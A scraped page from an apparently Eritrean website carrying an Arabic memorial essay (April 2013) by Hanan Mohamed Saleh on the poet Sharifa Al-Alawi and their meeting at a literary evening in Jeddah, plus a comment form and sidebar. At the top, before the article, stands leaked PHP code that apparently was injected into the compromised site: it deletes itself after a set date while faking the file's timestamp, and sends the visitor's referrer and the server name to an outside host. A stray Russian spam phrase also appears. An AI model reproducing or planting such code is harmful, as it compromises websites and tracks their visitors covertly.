check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727708){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } إبداع شريفة الفريد
кремлевская диета

إبداع شريفة الفريد

User Rating: / 0
PoorBest 

 

 

 

 

 

 

 

إبداع شريفة الفريد

يعود تاريخ معرفتي للأخت الشاعرة شريفة العلوي إلى عام 2008 ، حيث كنا نكتب معاً في ( ملتقى أدباء ومشاهير العرب ) . وكانت من سمات هذا الملتقى أن يكتب كل كاتب أو عضو جنسيته حتى يمثل ثقافة وأدب وطنه وهذا ساعدني وغيري على التعرف على أخوة وأخوات من معظم دول الوطن العربي ، ومازلت حتى الآن على تواصل مع كثيرين منهم . وكان ممن تعرفت عليهم في ذلك الملتقى " الشاعرة شريفة العلوي من جيبوتي " بهذا الاسم والوصف . وكانت كتابتها تتميز بالمفردة القوية والمعنى العذب ، وأذكر إنه في إحدى كتاباتها قد ذكرت عن والدها الذي كان معلم للغة العربية في ارتريا وكيف كان مع غيره صامد من أجل أن تحافظ هذه اللغة على مكانتها في دنكاليا بالذات . ومن هنا علمت إن لها جذور ارترية . ولكن لم يكن بيننا تواصل إلا عبر الردود في الملتقى .

وأخذتنا الحياة في دروبها المختلفة وأصبحت لا أكتب  إلا نادراً في ذلك الملتقى حتى صادف أن رأيت صفحتها في الفيس بوك في سبتمبر  2011 وصورة لديوانها " إلا أنا " وللحقيقة سعدت لها بهذا الديوان وأرسلت لها رسالة تهنئة . وبعدها تم توجيه دعوة لي من رئيس  الاتحاد الوطني لطلبة وشباب ارتريا- جدة  الأستاذ عبدالقادر مالك ورئيس اللجنة الثقافية  الأستاذ سليمان أحمد لحضور الأمسية الأدبية الإنشادية من أجل التعرف علي الشاعرة شريفة والاحتفاء بديوانها " إلا أنا " . ورحبت بالأمسية ووعدتهم بالحضور. وصادف إني واجهت صعوبة في المواصلات من أجل حضور الأمسية في جدة ومن ثم العودة في نفس الليلة إلى مكة . إلا إني كنت حريصة على حضور الأمسية  لأن الأمسيات الأدبية الإرترية قليلة  في السعودية بشكل عام وفي الغربية بشكل خاص ، ولذا لابد أن نعمل جميعاً على استمرارها بحضورنا ودعمنا لبعض من  كتاب ومثقفين . ومن ناحية أخرى لأني قد أخذت عهد على نفسي بدعم إي شخص إرتري يعمل من أجل خدمة مجتمعه وإعلاء مكانة ارتريا في جميع المجالات . وكان لدي رغبة سابقة للتعرف ورؤية شريفة العلوي على أرض الواقع ، و تيسرت الأمور وحضرت الأمسية .

خلال الأمسية  تعرفَ الحضور على شريفة العلوي عن قُرب . وبسبب مغادرتي الأمسية قبل انتهائها حرصت على إلقاء التحية عليها ومباركتها على ديوانها. فذهبت إليها في المنصة  وسلمت عليها  وعرفتها باسمي ، فعرفتني مباشرةً وقالت لي : كنت أقول لهم إني أعرف من ارتريا حنان محمد صالح .

فقلت لها : وأنا عرفتك جيبوتية واليوم تعرفت عليك أكثر وأنت إرترية .

فقالت لي : عباراتها التي تعني الكثير ( إرتريا تجمعنا ) . فعلا إرتريا التي هجرها وغادرها أبنائها مجبرين  وتشتتوا في العالم وحملوا جنسيات وطبائع وعادات مختلفة هي التي دائماً تجمعهم مهما تفرقوا فهي ( الأم ) .

أعطت شريفة التجمع الثقافي والأدبي الارتري إضافة قوية وبالذات للأقلام النسائية ، فأسلوب كتابة شريفة للشعر والمواضيع التي كانت تطرحها تختلف عن بقية الأديبات في الساحة الإرترية . ولذا حين عبر الشاعر محمد نور "شتات" عن الكاتبات الارتريات بعبارة اتذكر منها  " خديجة شاكر واليوم شريفة العلوي .." علقت على كلماته مازحة  " نعم أستاذ محمد نور.. خديجة ..شريفة ..نون النسوة قد حضرن فاستعدوا ) .

كانت شريفة نشيطة ولها حضور في عدة محافل أدبية سواء للقومية العفرية أو للأدب الارتري أو الجيبوتي . في تلك الأمسية كان من بين من حضر معها الإعلامية السعودية لميس الإمام وأخت أخرى من جيبوتي .. وصار موقف طريف إلا إن الأمر في بعده الثقافي والإبداعي والإنساني لم يكن طريف بل أمر آخر ..عميق وجميل  .

فأثناء إلقاء الشاعرة خديجة شاكر قصيدة لها ،

سألت الأستاذة لميس : هل هذه سعودية ؟

فأجبنا أنا وقريبتي منَا : بل إرترية . وأردفت منَا كل من في هذه  الأمسية إرتريين .

فاعترضت الأخت من جيبوتي وقالت : شريفة جيبوتية .

فقلنا بل إرترية فعادت وقالت جيبوتية ونحن نقول إرترية وتكرر الأمر وانتهى بضحكة  وقلنا هي تمثل الجميع . البُعد الأعمق في هذا الموقف إن المبدعين فقط  من تحرص الدول والشعوب أن ينتمون إليها وتفتخر بهم ، وشريفة كانت مبدعة فريدة بشعرها وحضورها وأخلاقها .

 

وفي موقف رحيلها  لا نقول إلا رحم الله شريفة الإنسانة وغفر لها وجعل مثواها الجنان وألهم ذويها الصبر والسلوان .

قال تعالى " كُلُّ مَنْ عَلَيْهَا فانٍ * وَيَبْقَى وَجْهُ رَبِّكَ ذُو الْجَلالِ وَالإكْرَامِ" سورة الرحمن

 

حنان محمد صالح

24 أبريل 2013

 



Add comment

Your comments are as important as the article you are commenting on. Please enrich the discussion by avoiding personal attacks. We'll publish your comment, if it meets our criteria. تعليقاتك لا تقل اهمية عن المقال المكتوب اعلاه، فالرجاء اثراء النقاش بالابتعاد عن الاساءات الشخصية. سوف ننشر تعليقك اذا استوف شروط النشر



Security code
Refresh

Enough dictatorship

Get Adobe Flash player

Arkokabay Media -----> Poem

Get Adobe Flash player

مرض الرئيس الأريتري بين الشائعة والنفي

Get Adobe Flash player

ALIA GABRES- SHE COTTON SUMMER DRESSES

Get Adobe Flash player

عمود الكتاب العربي

Arkokabay.com
Arkokabay.com
OMAR JABIR الأستاذ عمر جابر
OMAR JABIR الأستاذ عمر جابر
Zein Shokayالأستاذ زين شوكاي
Zein Shokayالأستاذ زين شوكاي
سعادة السفير حمد كلُ
سعادة السفير حمد كلُ
الأستاذ صلاح أبوراي
الأستاذ صلاح أبوراي
 الأستاذة حنان
الأستاذة حنان
الأستاذ موسى ضرار
الأستاذ موسى ضرار
الأستاذ أبو الرشيد
الأستاذ أبو الرشيد
الأستاذ عبدالفتاح ود الخليفة
الأستاذ عبدالفتاح ود الخليفة
الأستاذ ياسين محمد عبدالله
الأستاذ ياسين محمد عبدالله
الأستاذ محمد نور - بركان
الأستاذ محمد نور - بركان
الأستاذ جمال همد
الأستاذ جمال همد
الأستاذ فكاك ناير
الأستاذ فكاك ناير
الأستاذ أحمد صلاح الدين
الأستاذ أحمد صلاح الدين
Amal Ali الأستاذة أمال علي
Amal Ali الأستاذة أمال علي
Mohamed - Wahran Eritreaمحمد - وهران ارتريا
Mohamed - Wahran Eritreaمحمد - وهران ارتريا
الأستاذ حسن سلمان
الأستاذ حسن سلمان
الأستاذة منى محمد صالح
الأستاذة منى محمد صالح
الاستاذة نوره فارس
الاستاذة نوره فارس